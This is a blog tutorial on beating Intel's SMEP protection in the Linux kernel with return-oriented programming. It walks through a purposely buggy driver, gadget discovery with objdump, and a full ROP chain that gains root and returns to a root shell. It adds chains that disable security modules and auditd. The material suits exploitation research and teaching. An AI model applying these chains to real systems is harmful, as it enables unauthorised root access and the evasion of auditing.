Beat SMEP on Linux with Return-Oriented Programming
- November 9th, 2011
- Write comment
Introduction
In this post, I will show you how easy it is to use Return-Oriented Programming in the Linux kernel and how it can bypass protections such as SMEP, available in the next generation of Intel processor.
Linux buggy module
In order to simplify exploitation I have decided to develop a buggy driver containing a stack overflow.
Here is the important code (kbof.c):
struct kbof {
size_t size;
char *buf;
};
static int kbof_stackbof(struct kbof *kb)
{
char buf[64];
printk(KERN_INFO "kbof_stackbof: buf = %p size = %u\n", kb->buf, kb->size);
if (copy_from_user(buf, kb->buf, kb->size))
return -EINVAL;
return 0;
}
static long kbof_ioctl(struct file *fp, unsigned int cmd, unsigned long arg)
{
struct kbof kb;
if (copy_from_user(&kb, (struct kbof *)arg, sizeof(kb)))
return -EINVAL;
switch (cmd) {
case KBOF_STACKOVF:
return kbof_stackbof(&kb);
}
return 0;
}
This is a really simple stack overflow where you can control both the buffer and the length of the overflow.
This code path can be reached via an ioctl. The char device created for the module is /dev/kbof.
make mknod /dev/kbof c 60 0 chmod 666 /dev/kbof insmod ./kbof.ko
Finding the size of the overflow
First of all, we need to get the size of the overflow.
objdump gives us the answer :
kbof_stackbof: push %rbp mov %rsp,%rbp push %rbx sub $0x58,%rsp ... mov -0x20(%rbp),%rdx # %rdx = size mov -0x18(%rbp),%rsi # %rsi = src lea -0x60(%rbp),%rdi # %rdi = buf callq 0... retq
The buffer is 0×60 bytes below %rbp (the Fedora kernel is compiled without -fomit-frame-pointer). So the return address is stored 104 bytes (0×60 + 0×8) after buf.
SMEP vs kernel exploits
While the Linux kernel is easy to exploit and offers only few protections, patches such as PaX or processor features such as SMEP make current exploits unusable.
SMEP is a feature that will be present in the next generation of Intel processors (Ivy bridge). It prevents code in userspace (U/S=1 in page table entry) from being executed in ring0 mode (CPL=0).
It means that we can’t jump to our exploit process address space and execute our payload (get root credentials, execute a shell). This is where ROP come to our rescue : as we return in the kernel address space (U/S=0), no fault will be triggered by the cpu.
Finding gadgets
To achieve successful ROP exploitation, we have to find gadgets in the linux kernel image. As the kernel is a changing a lot, I used “git log” to find files that did not change much between releases. Several asm files (.S) in the arch/x86 directory have not changed for the last months. If we look at these files, we can see ROP instructions :
arch/x86/lib/rwsem_64.S:
call_rwsem_downgrade_wake: ... popq %r11 popq %r10 popq %r9 popq %r8 popq %rcx popq %rsi popq %rdi ret
arch/x86/lib/rwlock.S:
__read_lock_failed: decl (%rdi) js __read_lock_failed ret
To find other gadgets we have to disassemble the linux kernel image.
An example of how to extract a gzip compressed kernel image (1f8b0800 is the gzip signature) :
$ od -A d -t x1 /boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 | grep '1f 8b 08 00' 0017504 48 8d 83 c0 78 3a 00 ff e0 1f 8b 08 00 86 52 c8 $ dd if=/boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 bs=1 skip=17513 | zcat > vmlinux
And we use objdump to find gadgets. For example :
$objdump -d ./vmlinux |grep "mov %rax,%rdi" -A1| grep "callq" -B1 ... ffffffff8108fc6e: 48 89 c7 mov %rax,%rdi ffffffff8108fc71: ff d2 callq *%rdx ...
objdump best ROP tool ever !
Kernel ROP exploit
Current exploits trigger a kernel bug and redirect the execution to a function similar to kernelcode() :
void kernelcode()
{
commit_creds(prepare_kernel_creds(NULL));
asm volatile(
"swapgs\n"
"movq %0, 0x20(%%rsp)\n"
"movq %1, 0x18(%%rsp)\n"
"movq %2, 0x10(%%rsp)\n"
"movq %3, 0x8(%%rsp)\n"
"movq %4, 0x0(%%rsp)\n"
"iretq\n"
: : "r" (user_ss), "r" (stack + sizeof(stack) / 2),
"r" (user_rflags), "r" (user_cs), "r" (userland_code));
}
This function set root credentials to our process and return to userland (CPL=3).
I decided to take the same approach for my ROP exploit.
ROP : getting root privileges
Calling prepare_kernel_creds with the first argument set to NULL is easy. The following stack frame does this :
[ ... ] [ POP_RDI_RET ] [ 0UL ] [ @prepare_kernel_creds ] [ ... ]
Remember that %rdi is defined as the first argument of a function by the x86_64 ABI.
But it’s tricky to get the return value of prepare_kernel_creds (%rax) and use it as the commit_creds argument (%rdi). With the help of objdump, we find an interesting sequence :
ffffffff8108fc6e: 48 89 c7 mov %rax,%rdi ffffffff8108fc71: ff d2 callq *%rdx
We can’t directly set %rdx to commit_creds because the call instruction push the return address on the stack. To understand how it actually works, look at the final ROP payload below.
ROP : returning to userland
Now that we have root credentials on the machine, we would like to return to our userland process.
paranoid_swapgs is a good candidate :
paranoid_swapgs: swapgs [ restore registers ] add $0x30,%rsp [ restore registers ] add $0x50,%rsp jmpq irq_return # iretq
Final ROP payload
And the final ROP payload is :
[ POP_RDI_RET ] [ 0UL ] [ @prepare_kernel_cred ] [ @POP_RDX_RCX_RET ] [ @POP_RCX_RET ] [ JUNK ] [ @MOV_RAX_RDI_CALL_RDX ] [ @commit_creds ] [ @paranoid_swapgs ] [ 0x30 + 0x50 bytes junk] [ @exec_shell ] [ user_cs ] [ user_rflags ] [ @stack ] [ user_ss ]
Time to test our exploit :
[falken@vm-F15 kernel_overflow]$ ./exploit_rop [+] call_rwsem_downgrade_wake is at 0xffffffff81232500 [+] prepare_kernel_cred is at 0xffffffff81074718 [+] commit_creds is at 0xffffffff81074403 [+] paranoid_swapgs is at 0xffffffff8147611d sh-4.2# id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
W00t !
Bonus : disable security modules & auditd
Disabling security modules can be done by calling reset_security_ops :
static struct security_operations default_security_ops = {
.name = "default",
};
...
void reset_security_ops(void)
{
security_ops = &default_security_ops;
}
In order to disable auditd we have to set the variable audit_enabled to 0. This variable is set to 1 when auditing is enabled.
In rwsem_64.S, we find the perfect gadget :
decl (%rdi) js __read_lock_failed # not taken since (%rdi) == 0 ret
And the corresponding stack frame will be :
[ @POP_RDI_RET ] [ @audit_enabled ] [ @DEC_RDI_ADDR_RET ] [ @reset_security_ops ]
Other ideas to bypass SMEP
- Disable SMEP by flipping the proper bit in CR4.
- Allocate a RWX page, copy our shellcode and jump to it.
- Store the ROP payload in userspace as SMEP does not prevent kernel code from accessing userland data.
Conclusion
For sure SMEP will make kernel exploitation harder. Used with a relocatable kernel and kernel symbols hiding, the ROP technique presented here starts to be very difficult to realize… If there are no information leakage.
Links & code :
SMEP: What is It, and How to Beat It on Linux
SMEP: What is it, and how to beat it on Windows
